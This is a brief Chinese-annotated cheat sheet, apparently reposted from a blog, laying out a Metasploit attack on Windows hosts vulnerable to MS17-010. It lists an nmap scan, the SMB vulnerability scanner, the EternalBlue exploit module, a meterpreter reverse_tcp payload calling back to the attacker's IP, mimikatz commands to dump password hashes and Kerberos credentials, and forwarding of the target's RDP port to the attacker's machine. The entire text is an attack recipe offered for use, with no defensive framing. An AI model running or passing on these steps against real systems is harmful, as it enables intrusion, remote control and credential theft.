nmap -sV -Pn xxxxx 扫描端口and系统信息
use auxiliary/scanner/smb/smb_ms17_010 扫描模块
set Rhosts 扫描目标
use exploit/windows/smb/ms17_010_eternalblue 攻击模块
需要设置目标ip
RHOST
本机IP LHost
攻击载荷
set payload windows/x64/meterpreter/reverse_tcp
load mimikatz 加载mimikatz
msv导出hash
kerberos 获取账户密码
端口转发-
portfwd add -l 3389 -L 127.0.0.1 -p 3389 -r xxxxx目标ip
将目标的3389转发到本机3389上
原文:https://www.cnblogs.com/chaoba/p/8947391.html